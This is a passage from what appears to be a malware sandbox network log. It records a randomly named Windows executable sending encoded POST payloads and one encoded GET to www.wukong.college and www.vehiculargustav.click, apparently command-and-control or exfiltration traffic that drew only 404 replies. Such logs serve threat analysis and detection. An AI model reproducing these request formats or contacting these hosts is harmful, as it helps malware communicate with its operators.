                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 53 4a 73 2f 75 71 77 36 72 4f 5a 63 64 50 4e 43 31 4f 6a 74 6a 41 5a 4f 32 54 34 74 42 31 2b 75 31 53 52 65 61 38 3d
                                                                                        Data Ascii: A60d=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVSJs/uqw6rOZcdPNC1OjtjAZO2T4tB1+u1SRea8=
                                                                                        Nov 6, 2024 16:01:59.256027937 CET390INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:59 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.84974647.52.221.8805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:00.846220970 CET659OUTPOST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 6f 79 4f 31 37 4f 6f 32 6f 57 30 57 43 68 41 4e 6f 7a 79 4c 6e 73 31 2f 6b 42 76 72 7a 51 32 47 74 30 41 43 4a 4b
                                                                                        Data Ascii: A60d=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujoyO17Oo2oW0WChANozyLns1/kBvrzQ2Gt0ACJK
                                                                                        Nov 6, 2024 16:02:01.816914082 CET390INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:01 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.84974747.52.221.8805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:03.392417908 CET1676OUTPOST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 71 4d 59 66 62 64 66 32 2b 4e 78 43 67 74 50 79 2f 50 6b 30 6b 67 36 55 47 57 64 39 51 65 6d 66 6a 58 33 2f 63 41 75 35 61 44 6a 6e 74 69 43 32 34 33 2f 6d 6c 65 2b 59 35 67 35 69 4d 63 70 34 37 48 52 32 69 5a 63 42 4c 2b 37 2b 5a 73 2f 4b 4d 4c 76 68 78 36 46 70 4e 45 6a 39 6d 50 70 4a 43 6f 74 5a 44 50 6f 66 37 67 77 51 62 57 34 70 69 42 4d 56 76 69 33 34 69 56 73 4c 4c 4f 73 55 61 63 76 36 50 36 46 6b 45 46 67 4d 58 66 4d 49 4d 6c 73 59 42 54 6d 6f 78 7a 7a 4f 65 75 47 48 58 65 2f [TRUNCATED]
                                                                                        Data Ascii: A60d=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7WqnxlHtZ3vs6i0CZInR+gJhVq9cSvQJwFnGnjixq3u1yNpk0wgnqyasIcqhq1JI7NJg73hauRWfmCSWwtHALJhFJmHQ9afdOPbGb7l+Ccm8LNKWmHnqaqInoVQpi+oyikKqMYfbdf2+NxCgtPy/Pk0kg6UGWd9QemfjX3/cAu5aDjntiC243/mle+Y5g5iMcp47HR2iZcBL+7+Zs/KMLvhx6FpNEj9mPpJCotZDPof7gwQbW4piBMVvi34iVsLLOsUacv6P6FkEFgMXfMIMlsYBTmoxzzOeuGHXe/+BWAEUekv8fQTwzAlTnp34Zo65XPqONA0KOmWXVn7re8fVhS2k2qOeDw8SU5Kw3E6rmMoDXBsAmkkK1tLXAQuzj0GXkawECC7F+T4LkcFttwImo7WSrmfI/UZj8iVX9ErkX2O/c1P1Ik2oC1YarPK8eAEkILiUNZy7BPCYr0DUMmUtTA0quxvaE4SiJ7ZvWPwfemRARQWvTS5WnMZdVBATzuFBvLgnqHkiAZxsgzTl4qgGyxAt800yZBVk07HehO+n1ri1WazqVNLUw4iyTg6fsAyfYDJNlZXtE6P3ptEjboQzJQvKH/kdh08Y6YutWMpai113CjoZL20wM40hRmlXMkvaXRhFmr2s+WWbzENT4cmpMHm1qZA3cbId37xlPNhQIYcrRBpKaxvU9nyLuasZrbSrUiSb8q8qw1pYuU3x4zxNEBqnFmUS0l2FXFfdqqIUBg+KekLa9GqLvNLAy/1ho6wQVFhenCAhwVAHL29JGk/ugWKt0Zxv2i9A6B21BLwjdyvylOTnVXXvFSUBAfzFc+J0Kb+mY6jmFneaSo+CCpcQC3JtUpUI5VPRyygJQ8IP9y3Jgw4pb50O7mFdLJUFZrXmqbR8nOYY2PQP673ZH4DTtsMay6nDCtGsSNBpdXG9YiuCTMxfsH5ASjXCz4Lv5pCR+I1f2lu9 [TRUNCATED]
                                                                                        Nov 6, 2024 16:02:04.362221956 CET390INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:04 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.84974847.52.221.8805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:05.939378023 CET380OUTGET /9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:02:07.114680052 CET390INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:06 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.84974923.106.59.18805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:12.236635923 CET660OUTPOST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 39 75 2b 4b 76 36 37 41 57 35 63 30 66 30 7a 74 6e 2b 45 45 68 4d 52 77 79 6b 4c 6b 39 71 45 46 4a 34 77 32 61 77 3d
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5Ll9u+Kv67AW5c0f0ztn+EEhMRwykLk9qEFJ4w2aw=
                                                                                        Nov 6, 2024 16:02:13.027827024 CET423INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:12 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.84975023.106.59.18805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:14.789623022 CET680OUTPOST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 54 6a 39 64 59 45 67 79 41 70 39 54 52 4e 76 63 30 6d 56 53 31 7a 4b 59 31 69 2f 59 46 48 39 64 5a 72 35 52 6e 42 63 69 44 33 5a 50 64 78 74 32 34 43 70 49 61 50 65 61 67 33 30 49 66 4c 71 49 31 56 47 49 4c 5a 4d 36 45 62 76 4b 54 59 48 46 69 67 6c 67 6c 69 66 6f 6c 45 2f 4a 37 4c 6f 73 36 68 32 44 4f 6f 61 53 4b 36 75 45 2b 64 41 78 50 6b 6b 7a 30 63 2f 4d 54 65 52 50 57 4b 46 48 6c 50 34 4a 46 5a 33 46 32 43 48 68 6b 36 77 78 4d 39 68 4b 33 73 66 71 6f 41 6f 4e 6e 35 75 2f 4a 7a 47 79 52 74 79 73 56 44 73 63 58 72 54 45 66 33
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhk6wxM9hK3sfqoAoNn5u/JzGyRtysVDscXrTEf3
                                                                                        Nov 6, 2024 16:02:15.593745947 CET423INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:14 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.84975123.106.59.18805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:17.341619015 CET1697OUTPOST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 4c 6a 68 2b 51 45 76 78 59 70 2b 54 52 4e 77 73 30 6a 56 53 31 55 4b 59 74 2b 2f 59 41 79 39 59 56 72 34 7a 66 42 51 48 76 33 58 50 64 78 77 6d 34 44 30 59 62 56 65 61 77 7a 30 4d 44 4c 71 49 31 56 47 4c 54 5a 4c 72 45 62 74 4b 54 62 47 46 69 6b 68 67 6c 4b 66 6f 73 2f 2f 4a 76 62 6f 66 79 68 34 44 65 6f 63 67 53 36 78 30 2b 44 4e 52 50 43 6b 7a 35 62 2f 50 6d 76 52 50 53 73 46 47 52 50 36 39 51 64 6e 45 32 4c 46 69 45 7a 6f 79 55 56 6f 35 4c 55 56 61 6f 34 6b 4e 76 43 67 4c 51 54 44 78 78 6e 39 75 30 39 31 4e 72 63 66 45 69 30 44 36 35 39 50 44 69 38 6b 42 4e 75 70 55 39 65 66 6a 4d 51 63 35 75 36 6a 6d 45 52 6e 6f 55 69 42 70 5a 4b 63 4f 6d 38 64 61 6e 37 32 38 69 56 74 5a 6e 4f 63 71 70 32 74 7a 47 62 77 33 53 4e 53 76 30 6a 42 54 36 38 66 7a 39 4c 44 64 4c 70 2f 58 51 52 42 62 2b 44 32 65 56 62 7a 59 2b 6c 36 36 74 65 6b 77 6b 77 67 32 51 42 2f 6b 6e 39 44 [TRUNCATED]
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Ljh+QEvxYp+TRNws0jVS1UKYt+/YAy9YVr4zfBQHv3XPdxwm4D0YbVeawz0MDLqI1VGLTZLrEbtKTbGFikhglKfos//Jvbofyh4DeocgS6x0+DNRPCkz5b/PmvRPSsFGRP69QdnE2LFiEzoyUVo5LUVao4kNvCgLQTDxxn9u091NrcfEi0D659PDi8kBNupU9efjMQc5u6jmERnoUiBpZKcOm8dan728iVtZnOcqp2tzGbw3SNSv0jBT68fz9LDdLp/XQRBb+D2eVbzY+l66tekwkwg2QB/kn9DDaZmlZf5RAwaKsQNudRV+581HMJzp6U1coTJgSa4HEjNimGmxkXXcCIOfHqdJ3ObWOZY7xXEvlJQ91dsNFIgxOvdCeTCogYDrhO0odFP80qXy7BXqXD+mW30Ae6mQZDd4dEciPpC0iX8f+F3rqR/IUMP/G2lXOiFhUozQ+zGx8SabykCqj3Ane+9+GJRtdnNGiYc1RPGFjdLvVmo2MLEl3Yy7gSt/kJZS8ggBJiGEsS7jkZcGnOPkcXXpezYKCVjxM3DBdbhhgbT5OuGusaAA9trCkW5PYul6Lmjo9QVCbvYgiOfqlRDPTRh5yEhrhlSzBheDxMM+fYfn/KhLyBVRzIMegLFNqEqZaZnT5FX0cNqi/JXnerUjKC9HwAaNs14qlZzlpU8iPNnphiqRsSJUeHvrXOPvsgM4oEEUL1Gstk5QV9lWmtisS1YRhxKbuuL9tWjejovZXinNOIoEaHlEQcT5wpIFKeDnoYnDSUGCKVyAqYcdWtQDcfXyL3RTYn0AKQy7rxerWhMMM0Z/3kJa4aRrYxKyTaXMhZZmM8+oYGi+JP1v2JbpMeM7bpqJ1wOKd6Tcj6SeyUDPR48m0CoJiWyakXc6/1aP7TQLwvQM9tOOjHZimE8GZgN/KeCbbr3A85WQ2kKKzM11c2H53sbaggPPx0nab6EIv [TRUNCATED]
                                                                                        Nov 6, 2024 16:02:18.151864052 CET423INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:17 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.84975223.106.59.18805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
